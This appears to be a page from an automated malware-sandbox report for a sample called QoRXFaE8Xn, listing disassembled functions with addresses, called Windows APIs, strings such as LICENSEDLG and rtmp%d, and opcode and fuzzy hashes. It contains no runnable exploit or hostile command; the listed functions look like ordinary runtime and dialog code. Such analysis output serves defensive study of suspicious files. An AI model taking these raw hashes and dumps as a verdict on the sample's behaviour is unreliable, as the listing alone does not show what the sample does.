Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc01473ecd25543aebad36210e678e3f8851e121070959f96c0f7d050ffe5bb8
Instruction ID: 11276f14fe703456bd9ce9a5dec886426cba610c842a81392232e5edc9bcb20f
Opcode Fuzzy Hash: bc01473ecd25543aebad36210e678e3f8851e121070959f96c0f7d050ffe5bb8
Instruction Fuzzy Hash: E2E124755183848FC304CF29D89096BBBF0BB8A300F89095EF9D597352C335EA19DBA2

Function 008D3A3C Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
Instruction ID: eb0215328d011c931d1876923ae1a774fd95db7519308c511e3459dbd15fe830
Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
Instruction Fuzzy Hash: 5D9114B020474D8BDB28EB68D891BBA73A5FB90304F100A2FE597D7382EA74D645C753

Function 008E4969 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4b5d30d22d73da388a32f5f81640642665e14536b841adea2502cabdee6fe00
Instruction ID: c85a2c5b214a6c32b982384eb47e7d4c71c62dde2acbbc831f7154494b36e5ad
Opcode Fuzzy Hash: b4b5d30d22d73da388a32f5f81640642665e14536b841adea2502cabdee6fe00
Instruction Fuzzy Hash: 95619B316807D866CA34A96F4855BBF3384FB43328F102629E48EEB2D2D511DD41C31A

Function 008D3D6D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
Instruction ID: 2a4eebd102fec7c9722d7a2bed116ed925e5d393a8c5b7150e84af841b42814d
Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
Instruction Fuzzy Hash: 5871D57160474D5BDB24DF28C8D1FAD77A5FBA0308F004A2EE9C6CA782DA74DA858753

Function 008E473A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
Instruction ID: cf82d72188fff13ca231086707f41e0c2f21016bc73dbcd3df456875fd1f03ca
Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
Instruction Fuzzy Hash: F2516770600ADC56DB38996F8C5ABBF2BC9FB57308F182529E98ED7682C305DD4583D2

Function 008CDE6C Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd17031a6fa3fc1039f157b75ec751894800bef8cf6a26d8d77f1e31cbd38995
Instruction ID: 8f326690e7a3c1f4005285510d29fd95443da56c9ebc385172558a9cf700ba2b
Opcode Fuzzy Hash: fd17031a6fa3fc1039f157b75ec751894800bef8cf6a26d8d77f1e31cbd38995
Instruction Fuzzy Hash: 19818E9122D6D49DC7465F7D3CE46F63EB1A733310F1940BAD4C6C62A3C5368668EB21

Function 008CE8A0 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40adafe4dba9c5d73cd1e42fd4b8a1847af32c490200451cefe8c59e99471409
Instruction ID: 44c057c3c5bc8af080025095dec817c9cfc9b17f523c3d9170233b9ab0327276
Opcode Fuzzy Hash: 40adafe4dba9c5d73cd1e42fd4b8a1847af32c490200451cefe8c59e99471409
Instruction Fuzzy Hash: C351AF715083E64EC712CF289184A6EBFF1FEAA314F49499EE5D58B212D230D649CB93

Function 008CF968 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d67fe38776e3ffac99dbc7acc2ee3c12fe9ba260748082c578411cc13c21eee1
Instruction ID: 9caafbfe075e5f47e97e92272cf112a69ec43031d349407cee42ebb5d7985e77
Opcode Fuzzy Hash: d67fe38776e3ffac99dbc7acc2ee3c12fe9ba260748082c578411cc13c21eee1
Instruction Fuzzy Hash: 8C514671A083158BC748CF19D48059AF7E2FFC8354F058A2EE899E3741DB34EA59CB96

Function 008D37C1 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction ID: fa6b3ab8dac4ba4a420df183ec62f48d53e92e19503767a993a03b7190c5f4e1
Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction Fuzzy Hash: 6331E1B16047498FCB18DF28C85166ABBE0FB95304F104A2EE4D5C7742CB39EA49CB93

Function 008C5F3C Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eb59d3172419beff03068d6296e9bd0887db484a61c7e6bb73d6422235efcb4
Instruction ID: c13fd764c2a839a7f4f43ba947357defb7a9f0667504e31ee65023c7b3fb442a
Opcode Fuzzy Hash: 9eb59d3172419beff03068d6296e9bd0887db484a61c7e6bb73d6422235efcb4
Instruction Fuzzy Hash: FB21B332A205614BCB48CF2DEC90D3A7762FB86311746822FEB46DB2D1C935E965D6A0

Function 008CDA98 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 008CDABE

Part of subcall function 008C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008C401D

Part of subcall function 008D1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00900EE8,00000200,008CD202,00000000,?,00000050,00900EE8), ref: 008D15B3

_strlen.LIBCMT ref: 008CDADF
SetDlgItemTextW.USER32(?,008FE154,?), ref: 008CDB3F
GetWindowRect.USER32(?,?), ref: 008CDB79
GetClientRect.USER32(?,?), ref: 008CDB85
GetWindowLongW.USER32(?,000000F0), ref: 008CDC25
GetWindowRect.USER32(?,?), ref: 008CDC52
SetWindowTextW.USER32(?,?), ref: 008CDC95
GetSystemMetrics.USER32(00000008), ref: 008CDC9D
GetWindow.USER32(?,00000005), ref: 008CDCA8
GetWindowRect.USER32(00000000,?), ref: 008CDCD5
GetWindow.USER32(00000000,00000002), ref: 008CDD47

Strings

$%s:, xrefs: 008CDAB2
CAPTION, xrefs: 008CDC77
d, xrefs: 008CDBA5

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 3edd736867ec00adfd4cdfafffbc7100a34694d4aa2e01d283faaa53f169c537
Instruction ID: d882d601e0acc757925d23ca51b6a50d2935c200216788f99a334c4b112e7c87
Opcode Fuzzy Hash: 3edd736867ec00adfd4cdfafffbc7100a34694d4aa2e01d283faaa53f169c537
Instruction Fuzzy Hash: 69816A71508341AFD720DF68CD89F6BBBE9FB89704F04092DFA85D3291D670E90A8B52

Function 008EC233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 008EC277

Part of subcall function 008EBE12: _free.LIBCMT ref: 008EBE2F
Part of subcall function 008EBE12: _free.LIBCMT ref: 008EBE41
Part of subcall function 008EBE12: _free.LIBCMT ref: 008EBE53
Part of subcall function 008EBE12: _free.LIBCMT ref: 008EBE65
Part of subcall function 008EBE12: _free.LIBCMT ref: 008EBE77
Part of subcall function 008EBE12: _free.LIBCMT ref: 008EBE89
Part of subcall function 008EBE12: _free.LIBCMT ref: 008EBE9B
Part of subcall function 008EBE12: _free.LIBCMT ref: 008EBEAD
Part of subcall function 008EBE12: _free.LIBCMT ref: 008EBEBF
Part of subcall function 008EBE12: _free.LIBCMT ref: 008EBED1
Part of subcall function 008EBE12: _free.LIBCMT ref: 008EBEE3
Part of subcall function 008EBE12: _free.LIBCMT ref: 008EBEF5
Part of subcall function 008EBE12: _free.LIBCMT ref: 008EBF07

_free.LIBCMT ref: 008EC26C

Part of subcall function 008E84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,008EBFA7,008F3958,00000000,008F3958,00000000,?,008EBFCE,008F3958,00000007,008F3958,?,008EC3CB,008F3958), ref: 008E84F4
Part of subcall function 008E84DE: GetLastError.KERNEL32(008F3958,?,008EBFA7,008F3958,00000000,008F3958,00000000,?,008EBFCE,008F3958,00000007,008F3958,?,008EC3CB,008F3958,008F3958), ref: 008E8506

_free.LIBCMT ref: 008EC28E
_free.LIBCMT ref: 008EC2A3
_free.LIBCMT ref: 008EC2AE
_free.LIBCMT ref: 008EC2D0
_free.LIBCMT ref: 008EC2E3
_free.LIBCMT ref: 008EC2F1
_free.LIBCMT ref: 008EC2FC
_free.LIBCMT ref: 008EC334
_free.LIBCMT ref: 008EC33B
_free.LIBCMT ref: 008EC358
_free.LIBCMT ref: 008EC370

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 8d4518696c90b882bcd4a15ec44ca85896e27b23c88ce9a6866bb423157430f2
Instruction ID: 6d2b4732b4ce84695b631a5886024775d76f10eedf6ec5b1dfbe160b730df199
Opcode Fuzzy Hash: 8d4518696c90b882bcd4a15ec44ca85896e27b23c88ce9a6866bb423157430f2
Instruction Fuzzy Hash: 59319C32A00685DFEB20AA7ED945B5B73E9FF02310F10846AE558DB691DF31EC41CB25

Function 008DCD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 008DCD51
GetClassNameW.USER32(00000000,?,00000800), ref: 008DCD7D

Part of subcall function 008D17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,008CBB05,00000000,.exe,?,?,00000800,?,?,008D85DF,?), ref: 008D17C2

GetWindowLongW.USER32(00000000,000000F0), ref: 008DCD99
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 008DCDB0
GetObjectW.GDI32(00000000,00000018,?), ref: 008DCDC4
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 008DCDED
DeleteObject.GDI32(00000000), ref: 008DCDF4
GetWindow.USER32(00000000,00000002), ref: 008DCDFD

Strings

STATIC, xrefs: 008DCD83

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: e189270e3b214ca99773fb66c11beffeab486a8c5c8457af2853d5558e3cdcf1
Instruction ID: 9e310d69c0cd8c83265f02c5e49c474162c217f3656a9f78945c2431caa427cf
Opcode Fuzzy Hash: e189270e3b214ca99773fb66c11beffeab486a8c5c8457af2853d5558e3cdcf1
Instruction Fuzzy Hash: A01124725883117BE2316B64DC0AFAF375DFF41740F004222FA46E52A2CE748916D6A5

Function 008E8EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008E8EC5

Part of subcall function 008E84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,008EBFA7,008F3958,00000000,008F3958,00000000,?,008EBFCE,008F3958,00000007,008F3958,?,008EC3CB,008F3958), ref: 008E84F4
Part of subcall function 008E84DE: GetLastError.KERNEL32(008F3958,?,008EBFA7,008F3958,00000000,008F3958,00000000,?,008EBFCE,008F3958,00000007,008F3958,?,008EC3CB,008F3958,008F3958), ref: 008E8506

_free.LIBCMT ref: 008E8ED1
_free.LIBCMT ref: 008E8EDC
_free.LIBCMT ref: 008E8EE7
_free.LIBCMT ref: 008E8EF2
_free.LIBCMT ref: 008E8EFD
_free.LIBCMT ref: 008E8F08
_free.LIBCMT ref: 008E8F13
_free.LIBCMT ref: 008E8F1E
_free.LIBCMT ref: 008E8F2C

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 95f9dd05056e4fb05f4cd1c8e09e18dd8501b4c2f41049a5f4bf472a89ac64c2
Instruction ID: ebf4971268f6a4f692d23c001cf66b6f00b05e7105a6adda0e1f6622d23a85b3
Opcode Fuzzy Hash: 95f9dd05056e4fb05f4cd1c8e09e18dd8501b4c2f41049a5f4bf472a89ac64c2
Instruction Fuzzy Hash: E811C37610054DFFCB11EF9AC842CDE3BA5FF05354B0140E0BA0C8B6A6DA31DA519F86

Function 008C2162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

xc%u, xrefs: 008C26D7
;%u, xrefs: 008C2497
x%u, xrefs: 008C267A

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: 1610a9beb0f1f6f6e023244c375332299dcee1d03c4086d96c016c88525d8c25
Instruction ID: ca41766e55a8a4cad2a5a68680acfd366c4ce679bb5933cd1e8f7e77764a4c6f
Opcode Fuzzy Hash: 1610a9beb0f1f6f6e023244c375332299dcee1d03c4086d96c016c88525d8c25
Instruction Fuzzy Hash: A2F1D4716042845BDB15EE3889D5FEA77B6FFA0300F08456EE989CB2C3DA74D845C7A2

Function 008DACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008C130B: GetDlgItem.USER32(00000000,00003021), ref: 008C134F
Part of subcall function 008C130B: SetWindowTextW.USER32(00000000,008F35B4), ref: 008C1365

EndDialog.USER32(?,00000001), ref: 008DAD20
SendMessageW.USER32(?,00000080,00000001,?), ref: 008DAD47
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 008DAD60
SetWindowTextW.USER32(?,?), ref: 008DAD71
GetDlgItem.USER32(?,00000065), ref: 008DAD7A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 008DAD8E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 008DADA4

Strings

LICENSEDLG, xrefs: 008DACE4

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: c71933b317a2e8c8d87f63081caf4cdf58519460ac492284a4adee552461c562
Instruction ID: a6a70b5017ea034967059867e36a8e27a08137bb795d7ffabd24d9bd76e900ce
Opcode Fuzzy Hash: c71933b317a2e8c8d87f63081caf4cdf58519460ac492284a4adee552461c562
Instruction Fuzzy Hash: 7721F332298104BFD2255F35EC49E7B3B6EFB46B46F100115F640E26A0CB629901F632

Function 008C9443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008C9448
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 008C946B
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 008C948A

Part of subcall function 008D17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,008CBB05,00000000,.exe,?,?,00000800,?,?,008D85DF,?), ref: 008D17C2

_swprintf.LIBCMT ref: 008C9526

Part of subcall function 008C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008C401D

MoveFileW.KERNEL32(?,?), ref: 008C9595
MoveFileW.KERNEL32(?,?), ref: 008C95D5

Strings

rtmp%d, xrefs: 008C950F

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: cfa0277526433720f0263b2af73500b17a376e89b961b3abc1593bf04b6cf23e
Instruction ID: e6000522e38f757476b25eaad10b3e3202bb9c454a2859ef99ac7cf27bbd40a8
